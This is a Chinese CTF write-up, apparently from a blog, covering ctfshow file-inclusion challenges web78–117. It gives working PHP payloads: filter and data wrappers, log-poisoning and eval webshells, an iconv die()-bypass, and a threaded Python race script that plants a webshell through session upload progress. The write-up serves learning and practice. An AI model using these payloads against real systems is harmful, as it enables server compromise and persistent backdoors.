ctfshow-文件包含

web78

<?phpif(isset($_GET['file'])){$file = $_GET['file'];include($file);
}else{highlight_file(__FILE__);
}

判断是否存在file参数 如果存在 将包含这个参数值 文件

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。

filter伪协议

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。

file=php://filter/convert.base64-encode/resource=flag.php

base64解码即可

data伪协议 简单理解就是执行自定义代码 

c=data://text/plain,<?php system('tac fla?.php');?>

web79

<?phpif(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

严格一点点 参数值中不能存在php字符

方法一

使用data伪协议 可以不使用正常的php标签 使用段标签即可 然后使用*代替php

file=data://text/plain,<?=system('tac fl*');?>

方法二

GET POST 联合使用

file=data://text/plain,<?=eval($_POST[1]);?>
POST 1=system("tac flag.php");

web80

<?phpif(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

要求更严格了 data协议不能使用了

那就是用日志方式

日志地址

/var/log/nginx/access.log

插入User-Agent值为

<?php eval($_POST[1]);?>

访问 日志地址 post参数1=system("ls"); 查看当前目录下文件有哪些 查看到有个fl0g.php文件

查看fl0g.php文件内容

web81

<?phpif(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

更严格一点不能使用冒号 但是貌似没影响 与web80同理

web82

参考b站视频以及session包含/反序列化

 参考

<?php
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

禁用了. 导致上一题的日志包含也不行了 只能使用session包含了 ,php里面 唯一我们能控制的无后缀的就是session,需要用到到php_session_upload_progress参数,这个参数是为了获得这个文件上传进度的实时参数

这道题没开启session 如何创建session文件呢? 我们如果只要上传一个cookie 键是sessid 值任意 这样提交后 php会在默认session目录中创建一个 sess_aaa的文件 路径基本上为/tmp/sess_aaa  既然有个session相关文件了 服务器也就自动初始化session了

 这么文件名字我们是可以控制的 可以控制aaa  所以这道题如果只能包含无后缀的 那就可以包含这个session的临时文件

现在文件名字 我们控制了 如何控制文件内容呢

控制文件内容我们需要PHP_SESSION_UPLOAD_PROGRESS 这个参数是获取实时文件上传进度的  我们控制这个参数 来写我们指定内容 通过指定该参数的post值 会拼接默认名字写进去(这句话现在不理解 一会回头看一下) 刚刚群主举个例子 如果PHP_SESSION_UPLOAD_PROGRESS值为123 则知道 /tmp/sess_aaa的内容为123

现在前提都准备好了 但是session临时文件在文件全部上传成功后就会被删除 这时需要session竞争  在文件还没被删除的时候 访问到这个文件  简单理解就是 大量的上传同一个文件 持续访问某个session文件  该脚本 就是开启5个多线程  持续的发送 为何要开启多线程呢?正常情况下开启一个线程也是可以的 但是一般都竞争不出来 都是开启进程让提交的速度加大 访问的速度加大

再简单理解这个线程就是 每秒提交1次文件 和访问1次 因为提交的速度特别快 还没等访问呢 文件就被删除了 如果每秒提交1000次文件 和访问1000次 这样就大大加大访问成功的概率这个不代表

访问第500次的时候是访问第500次提交的文件 而是可能访问到的是第400次提交文件时生成的文件

这里我开五个线程很快就能出结果  我试了一下开20个进行 一瞬间就出结果了

import requests
import threading
import io
a=0
url = "http://6db55daa-3871-4fd6-b564-8e6289806146.challenge.ctf.show/"
sessID = 'tzy'
data = {"1": "file_put_contents('/var/www/html/8.php', '<?php eval($_POST[2]);?>');"  # read()中需要post的内容
}
def write(session):global afileBytes = io.BytesIO(b'a' * 50)#定义一个大小为50kb的文件赋值给fileBytes变量中# 解释一下使用while循环的原因 当前函数现在开启了5次线程 也就是说 同时会向服务器提交五次write函数 如果不设置循环 也就相当于同意时间只提交五次函数 就退出程序了# 如果在函数内部定义while循环 这样就能做到 持续进行 每次提交五次函数 换位思考也就是说 提交五次函数 每一次都是一个循环 这五个都是循环 也就能做到 持续性多线程# 这种方法 和在线程外部加入一个while循环一个意思while True:if a:break#使用传进来的session对象执行post提交请求res = session.post(url,data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>'# 改参数的值就是/tmp/sess_tzy文件的内容},cookies={"PHPSESSID": sessID},files={'file': ('tzy.png', fileBytes)})#print(res.request.headers)#print(res.request.body)
def read(session):global awhile True:res1 = session.post(url + '?file=/tmp/sess_' + sessID, data=data,cookies={"PHPSESSID": sessID})res2 = session.get(url + '8.php')if res2.status_code == 200:print("+++done+++")a=1breakelse:print(res2.status_code)
if __name__ == '__main__':# 开启多线程 直接解释代码 python会同时提交五次write函数 和五次read函数event = threading.Event()  # 开启多线程的对象# 这个session对象 是requests.session()类的实例化# request.session 包含 request.request的功能 比如get() post()# 而session这个类还可以自动处理cookie 会自动地处理与会话相关的内容,比如 cookies 的保存和发送# Session 对象的优势在于它会在整个会话中自动管理 cookies,并在多个请求之间共享 cookies 和会话状态。# 这意味着你只需要在第一个请求中设置 cookies,后续的请求会自动使用相同的 cookieswith requests.session() as session:for i in range(5):  # 开5个线程 执行write函数传入session对象最为参数threading.Thread(target=write, args=(session,)).start()for i in range(5):threading.Thread(target=read, args=(session,)).start()event.set()  # 唤醒线程

获得flag

web83

<?php
session_unset();
session_destroy();if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

在程序前销毁session的全部变量 以及全部数据  没影响 我们直接加入cookie服务器识别出来存在session id后自动就初始化session了  同web82一样

web84

<?php
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);system("rm -rf /tmp/*");include($file);
}else{highlight_file(__FILE__);
}

好狗直接把临时目录的文件全部删除了 但是发现不影响呀

本身 session.upload_progress.cleanup = on 会清空对应 session 文件中的内容 

再加上一条删除文件 影响不大 加快请求速度呗 不加快5多线程也行    反正记住就行 无论他删不删对我们都没影响 因为啥就算这个请求执行到删除了 然后执行包含 如果在执行include前0.001s又生成了一个临时文件 她依旧是可以包含的 最坏的情况 无非也就是加快线程呗 加快速度

web85

<?php
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);if(file_exists($file)){$content = file_get_contents($file);if(strpos($content, "<")>0){die("error");}include($file);}}else{highlight_file(__FILE__);
}

说实话这道题 我挺蒙 哪怕多线程为什么能绕过die呢 每个线程都能匹配到die呀 原来这道题开多线程和上一题开多线程 能成功的原因 不一样 这一道题开5不行 开20可以 是因为 在高并发/高线程的情况下 有个特性就是竞争 而竞争会导致很多的不确定性 比如这道题在执行die的时候 因为多线程抢占资源的原因 可能会导致die还没执行成功呢 include就已经被执行成功了 

web86

<?php
define('还要秀?', dirname(__FILE__));
set_include_path(还要秀?);
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

定义了文件包含指定目录 也就是说想要包含的文件必须在指定目录下 否则包含不成功

难道还是要利用高线程导致竞争从而还没定义目录位置 就已经执行include了吗? 查看一下其他师傅的wp

结果是是这个原因 include包含的文件如果存在路径 他会按照指定路径查找文件 如果只存在文件名不存在路径 include首先会去定义的位置进行寻找文件 没有则在当前文件所在的目录和当前工作目录下寻找 所以不影响我们 线程5应该就可以了 不需要高并发导致的不确定行为 而是普通的和服务器删除速度来竞争 不是高并发的竞争

的确我说对了

注意:早session包含中

这里说一下 提交请求后的请求体是 不是想象的那种post 键值对的形式 而是表单的形式PHP_SESSION_UPLOAD_PROGRESS 也在表单中 这块的简单知识点 有时间得看看

<!DOCTYPE html>
<html>
<body>
<form action="http://26bfc8ed-f28a-46ef-94a6-bbff5bb92e6b.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data"><input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /><input type="file" name="file" /><input type="submit" value="submit" />
</form>
</body>
</html>

web87

<?php
if(isset($_GET['file'])){$file = $_GET['file'];$content = $_POST['content'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);}else{highlight_file(__FILE__);
}

参考p神文章

file_put_content和死亡·杂糅代码之缘

方法一使用 过滤器中的base64 解码绕过 将死亡函数进行解码 变为非法字符

file=php://filter/write=convert.base64-decode/resource=hello.php

在base64解码中 每四个字符为一组解码为三个字符 并且只有字母为解码的字符 phpdie为6个 需要在$content前任意添加两个字符 

content=abPD8gcGhwaW5mbygpOz8+

将file参数的值进行url全编码使用bp

从浏览器到服务器 他会自动进行一次解码 为什么要两次编码呢?两点 第一点本身写文件的时候他会解码一次 第二点在过滤的时候 如果不进行二次url编码 他会把关键词换成问好 这两点同时满足 这样两次url编码就可以了 

验证成功 同理 换content的值即可得到flag

方法二使用 过滤器中的rot13 编码绕过 解码绕过 将死亡函数进行解码 变为非法字符

和base64同理 

现将payload进行rot13编码

file=php://filter/write=string.rot13/resource=hello2.php

concent=<?cuc cucvasb();?>

死亡代码<?php die('大佬别秀了');?>已经被解码为<?cuc qvr('大佬别秀了');?>

这里有个问题如果服务器开启了可以使用短标签那么服务器就会解析该短标签了 我们的payload就不会被执行了  就不能使用这种方法了 因为该解码方式不会解码<?等符号 并且会原封不动的写入到文件中

web88

<?php
if(isset($_GET['file'])){$file = $_GET['file'];if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){die("error");}include($file);
}else{highlight_file(__FILE__);
}

使用data伪协议

因为过滤了 php那就使用base编码 有的时候如果base编码后出现= 或者 +号 也会被过滤掉 在后方加入1来混淆

比如

<?php echo `ls`?>和<?php system('ls'); ?> 一个意思

?file=data://text/plain;base64,PD9waHAgZWNobyBgbHNgPz4xMTEx

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmwqJyk/PjEx

web116

开局一个视频 无法查看源码 下载视频 使用010打开 搜索各种文件的标头标识 发现 存在PNG文件

PNG图片以IEND结尾 复制粘贴到新建十六进制文件 另存1.PNG

打开图片后

源码文件的意思就是读取一个文件 输出到浏览器中 

在浏览器中虽然不能右键查看源码 但是可以使用view-source:

那就读取 flag.php(只能一个一个尝试)

web117

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){die('too young too simple sometimes naive!');}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

不能使用base64和rot13解码绕过了 把一句话木马从UCS-2LE编码转换为UCS-2BE编码。

其实关键的不是两种编码方式(这两个编码方式可以换位置) 这两种编码方式都是一样的 不会改变任何字符 关键的是iconv这个函数 他可以进行两个字符反转一次(切记 需反转的字符必须是2的整数倍 否则报错,如果报错可以通过修改密码 增加字符 或者在后面再加上任意一个字符 反正服务器也不解析)

<?php
$result = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_POST[aa]);?>');
echo "payload:".$result."\n";
?>
#?<hp pe@av(l_$OPTSa[]a;)>?

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=hello.php

contents=?<hp pe@av(l_$OPTSa[]a;)>?

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/421501.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Jmeter终极线程组“Ultimate Thread Group“如何使用?

1、安装,点击"选项"&#xff0c;再点击"Plugins Manager"&#xff0c;下载"Custom Thread Groups" 2、添加"jpgc - Ultimate Thread Group" 3、"jpgc - Ultimate Thread Group"使用

DC 板 boot 测 nor 兼容性记录(qspi )

DC 板 boot 测 nor 兼容性记录&#xff08;qspi &#xff09; 软件问题&#xff1a; 1、DC板在跑 qspi时&#xff0c;在跑ddr 初始化部分需要修改以下参数&#xff0c;否则会在fsbl stage1 或者 stage 3 出错。 Board配置选 ad101_v10&#xff1b; 2、由于socket与DC板接触可能…

【springboot】父子工程项目搭建

父工程创建 1.新建一个spring项目 2.选择合适的springboot版本&#xff0c;点击【完成】&#xff0c;即创建父工程完毕 3.删除父工程中无用文件&#xff1a;src 创建子工程模块 1.右键项目名->新建&#xff08;news&#xff09;->模块&#xff08;Module&#xff09;…

【linux-Day2】linux下的基本指令

【linux-Day2】linux下的基本指令 一键查看操作系统的重要地位linux下的基本指令&#x1f4e2;ls&#xff1a;显示当前目录下所有的子目录和文件&#x1f4e2;pwd&#xff1a;显示用户当前所在的目录&#xff0c;在windows中&#xff0c;相当于显示当前目录的绝对路径。&#x…

Oracle绑定变量窥视与自适应游标共享

一.Oracle的绑定变量窥视与自适应游标共享 创建test表&#xff0c;列status存在2个值&#xff0c;有数据倾斜&#xff0c;在列status create table test as select rownum id,DBMS_RANDOM.STRING(A,12) name,DECODE(MOD(ROWNUM,500),0,Inactive,Active) status from all_obj…

2024最新精选文章!分享5款论文ai生成软件

在2024年&#xff0c;AI论文生成软件的出现极大地提升了学术写作的效率和质量。这些工具不仅能够帮助研究人员快速生成论文草稿&#xff0c;还能进行内容优化、查重和排版等操作。以下是五款值得推荐的AI论文生成软件&#xff0c;其中特别推荐千笔-AIPassPaper。 ### 千笔-AIPa…

【Jupyter Notebook】汉化

1.打开:Anaconda Prompt 2.输入:"activate Zhui01"(注意&#xff1a;Zhui01是刚创建的环境名字) activate Zhui01 3.输入:"pip install jupyterlab-language-pack-zh-CN" pip install jupyterlab-language-pack-zh-CN 4.打开:Jupyter Notebook 5.点击&q…

【稀疏矩阵】使用torch.sparse模块

文章目录 稀疏矩阵的格式coocsrcsc Construction of Sparse COO tensorsConstruction of CSR tensorsLinear Algebra operations&#xff08;稀疏与稠密之间混合运算&#xff09;Tensor methods and sparse&#xff08;与稀疏有关的tensor成员函数&#xff09;coo张量可用的ten…

E32.【C语言 】练习:蓝桥杯题 懒羊羊字符串

1.题目 【问题描述】 “懒羊羊”字符串是一种特定类型的字符串&#xff0c;它由三个字符组成&#xff0c;具有以下特点: 1.字符串长度为 3. 2.包含两种不同的字母。 3.第二个字符和第三个字符相同 换句话说&#xff0c;“懒羊羊”字符串的形式应为 ABB&#xff0c;其中A和B是不…

Python去中心化身份验证指南

随着区块链技术的发展,去中心化身份验证系统成为了保护个人数据安全和确保数字身份不被篡改的重要工具。本文将介绍如何利用Python和区块链技术构建一个简单的去中心化身份验证系统,包括基本概念、实现步骤和代码示例。 什么是去中心化身份验证系统? 去中心化身份验证系统…

SpringBoot学习(8)RabbitMQ详解

RabbitMQ 即一个消息队列&#xff0c;主要是用来实现应用程序的异步和解耦&#xff0c;同时也能起到消息缓冲&#xff0c;消息分发的作用。 消息中间件最主要的作用是解耦&#xff0c;中间件最标准的用法是生产者生产消息传送到队列&#xff0c;消费者从队列中拿取消息并处理&…

【网易低代码】第3课,页面表格删除功能

你好&#xff01; 这是一个新课程 CodeWave网易低代码 通过自然语言交互式智能编程&#xff0c;同时利用机器学 习&#xff0c;帮助低代码开发者进一步降低使用门槛、提高应用开发效率 【网易低代码】第3课&#xff0c;页面表格删除功能 1.拖拽组件link链接到表格中&#xff0c…

一文读懂在线学习凸优化技术

一文读懂在线学习凸优化技术 在当今的数据驱动时代&#xff0c;机器学习算法已成为解决复杂问题的关键工具。在线学习凸优化作为机器学习中的一项核心技术&#xff0c;不仅在理论研究上具有重要意义&#xff0c;还在实际应用中展现出巨大的潜力。本文将深入浅出地介绍在线学习…

初识C++|继承

&#x1f36c; mooridy-CSDN博客 &#x1f9c1;C专栏&#xff08;更新中&#xff01;&#xff09; 目录 1. 继承的概念及定义 1.1 继承的概念 1.2 继承定义 1.2.1 定义格式 1.2.2 继承父类成员访问方式的变化 1.3继承类模板 2. 父类和子类对象赋值兼容转换 3. 继承中的…

使用docker配置wordpress

docker的安装 配置docker yum源 sudo yum install -y yum-utils sudo yum-config-manager \ --add-repo \ http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo下载最新版本docker sudo yum install -y docker-ce docker-ce-cli containerd.io docker-buildx-…

arxiv 首次投稿注意事项记录

文章目录 注册用教育邮箱&#xff0c;不用背书latex&#xff1a; 主tex和bib文件放在最外层&#xff0c;重命名为arxiv.tex和arxiv.bib &#xff08;没测试过不重命名会怎么样&#xff09;在overleaf右上方点submmit&#xff0c;选arxiv&#xff08;这样会自动生成一个bbl文件&…

苹果的“AI茅”之路只走了一半

今年苹果发布会最大的亮点&#xff0c;也许是和华为“撞档”&#xff0c;又或者是替腾讯“发布”新手游&#xff0c;但肯定不是iPhone 16。 9月10日&#xff0c;苹果秋季新品发布会与华为见非凡品牌盛典相继举行&#xff0c;iPhone 16系列也与HUAWEI Mate XT同日发布。 不过&…

QT之QML学习五:添加自定义Qml组件

开发环境: 1、Qt 6.7.2 2、Pyside6 3、Python 3.11.4 4、Windows 10 重要的事情说三遍,使用自定义qml参考链接: Qt官网参考网址!!! 重要的事情说三遍,使用自定义qml参考链接: Qt官网参考网址!!! 重要的事情说三遍,使用自定义qml参考链接: Qt官网参考网址!!!…

基于vue框架的城市智慧地铁管理系统73c2d(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。

系统程序文件列表 项目功能&#xff1a;用户,站点查询,车次线路,站点周边 开题报告内容 基于Vue框架的城市智慧地铁管理系统开题报告 一、研究背景与意义 1.1 研究背景 随着城市化进程的加速和人口的不断增长&#xff0c;城市交通压力日益增大。地铁作为城市公共交通的重要…

【QT】常用类

欢迎来到Cefler的博客&#x1f601; &#x1f54c;博客主页&#xff1a;折纸花满衣 &#x1f3e0;个人专栏&#xff1a;QT 目录 &#x1f449;&#x1f3fb;QMediaPlayer&#x1f449;&#x1f3fb;QMediaPlaylistsetPlaybackMode &#x1f449;&#x1f3fb;QDir&#x1f449;…